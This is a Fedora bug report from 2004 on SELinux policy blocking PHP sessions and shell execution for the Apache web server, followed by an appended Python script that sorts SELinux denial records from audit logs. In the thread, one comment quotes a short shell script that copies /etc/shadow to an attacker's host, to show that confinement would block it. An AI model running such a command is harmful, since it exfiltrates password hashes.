Bug 121063
| Summary: | php session management in enforcing mode | | |
|---|---|---|---|
| Product: | Fedora | Reporter: | Tim Waugh <twaugh> |
| Component: | php | Assignee: | Joe Orton <jorton> |
| Status: | CLOSED CURRENTRELEASE | QA Contact: | David Lawrence <dkl> |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | rawhide | CC: | dwalsh, wtogami |
| Target Milestone: | --- | | |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2004-11-22 11:59:07 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
Description
Tim Waugh
2004-04-16 17:01:27 UTC
Is SELinux going to get in the way even for the "unprivileged" httpd children running setuid apache? This is painful.

httpd, when running as the 'apache' user, needs to have permissions to do whatever it likes in /var/lib/php/session/. This can be added to the policy. This particular webapp also needs write access to /var/www/html/, but that's not something which can go in the policy; in general, you *don't* want the web server to have write access to the web content. Except when you do. So this is something the server admin needs to configure, I guess.

The /var/lib/php/session policy was changed, so this bug can be closed. However, gallery is still a long way from working since it uses system() in the install scripts. Joe, how can I test and fix this? Dan

Unless you want to allow httpd to exec /bin/bash in the default policy (which I would guess defeats the point of having SELinux on by default) you can't fix this.

No, allowing it to exec bash does not necessarily open you to a great deal of problems. You would still be running in the httpd context. So even if a hacker broke into apache and got it to run a shell

    #!/bin/sh
    scp /etc/shadow MYHOST

it would fail because httpd_t is not allowed to access /etc/shadow.
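The thread above turns on one distinction an admin has to make when reading audit logs from a confined httpd: some denials are the policy being wrong for the workload (the PHP session directory before its label was fixed), some are a decision the admin owns (whether the web server may write its own content), and some are the confinement doing exactly what it is for (httpd_t trying to exec a shell or read /etc/shadow). The script below is an added example, not code from this bug report or from Fedora; it parses auditd AVC records and sorts them into those buckets. The audit lines are constructed for the example, the SELinux type names (var_lib_t, httpd_sys_content_t, shell_exec_t, shadow_t) are standard reference-policy types, and the triage rules are the example's own assumptions about what an admin would want flagged.

```python
"""Triage SELinux AVC denials involving the confined web server (httpd_t).

Added example for the bug discussion; not code from the bug report or from
Fedora. The audit lines are constructed, and the classification rules are
assumptions: denials on the PHP session directory should be fixed by
labelling, denials on web content are an admin decision, and denials on
shells or /etc/shadow are the confinement working as intended.
"""
import re
from collections import Counter

# Constructed sample audit records in the auditd AVC layout (not taken from the bug).
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1082134887.101:201): avc:  denied  { write } for  pid=2231 comm="httpd" name="session" dev=hda3 ino=98765 scontext=user_u:system_r:httpd_t tcontext=system_u:object_r:var_lib_t tclass=dir
type=AVC msg=audit(1082134887.233:202): avc:  denied  { write } for  pid=2231 comm="httpd" name="html" dev=hda3 ino=4321 scontext=user_u:system_r:httpd_t tcontext=system_u:object_r:httpd_sys_content_t tclass=dir
type=AVC msg=audit(1082134890.510:203): avc:  denied  { execute } for  pid=2240 comm="httpd" name="bash" dev=hda3 ino=1111 scontext=user_u:system_r:httpd_t tcontext=system_u:object_r:shell_exec_t tclass=file
type=AVC msg=audit(1082134891.007:204): avc:  denied  { read } for  pid=2251 comm="sh" name="shadow" dev=hda3 ino=2222 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:shadow_t:s0 tclass=file
type=SYSCALL msg=audit(1082134891.007:204): arch=40000003 syscall=5 success=no exit=-13
"""

# Matches the fixed prefix of an AVC record; the key=value tail is parsed separately.
AVC_RE = re.compile(
    r"type=AVC\s+msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):\s+avc:\s+"
    r"(?P<result>denied|granted)\s+\{\s*(?P<perms>[^}]*?)\s*\}\s+for\s+(?P<rest>.*)$"
)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def selinux_type(context):
    """Return the type (third field) of a user:role:type[:level] context."""
    parts = context.split(":")
    return parts[2] if len(parts) >= 3 else context


def parse_avc(line):
    """Parse one audit line; return a dict for AVC records, None for any other record type."""
    m = AVC_RE.match(line.strip())
    if not m:
        return None
    rec = {k: v.strip('"') for k, v in KV_RE.findall(m.group("rest"))}
    rec["serial"] = int(m.group("serial"))
    rec["result"] = m.group("result")
    rec["perms"] = m.group("perms").split()
    rec["stype"] = selinux_type(rec.get("scontext", ""))
    rec["ttype"] = selinux_type(rec.get("tcontext", ""))
    return rec


# Assumed triage rules for httpd_t denials (this example's policy, not Fedora's).
RELABEL_TYPES = {"var_lib_t"}                   # e.g. /var/lib/php/session left with a generic label
ADMIN_DECISION_TYPES = {"httpd_sys_content_t"}  # web content: writable only if the admin says so
BLOCKED_BY_DESIGN_TYPES = {"shell_exec_t", "shadow_t"}


def classify(rec):
    """Bucket a parsed AVC record; anything not a denial from httpd_t is ignored."""
    if rec is None or rec["result"] != "denied" or rec["stype"] != "httpd_t":
        return "ignore"
    if rec["ttype"] in RELABEL_TYPES:
        return "relabel"
    if rec["ttype"] in ADMIN_DECISION_TYPES and "write" in rec["perms"]:
        return "admin-decision"
    if rec["ttype"] in BLOCKED_BY_DESIGN_TYPES:
        return "blocked-by-design"
    return "review"


def triage(log_text):
    """Return (serial, category, perms, target name, target type) for each AVC line."""
    out = []
    for line in log_text.splitlines():
        rec = parse_avc(line)
        if rec is None:
            continue
        out.append((rec["serial"], classify(rec), " ".join(rec["perms"]),
                    rec.get("name", "?"), rec["ttype"]))
    return out


def summarize(log_text):
    """Count denials per category so labelling noise and real confinement events separate."""
    return Counter(cat for _, cat, *_ in triage(log_text))


if __name__ == "__main__":
    for serial, cat, perms, name, ttype in triage(SAMPLE_AUDIT_LOG):
        print(f"audit #{serial}: {cat:18} {perms:8} on {name!r} ({ttype})")
    print(dict(summarize(SAMPLE_AUDIT_LOG)))
```

Run against a real /var/log/audit/audit.log the "relabel" bucket is the one to act on with a file-context fix, the "admin-decision" bucket is the /var/www/html question from the thread, and "blocked-by-design" entries are the ones worth keeping as evidence rather than silencing with a policy change.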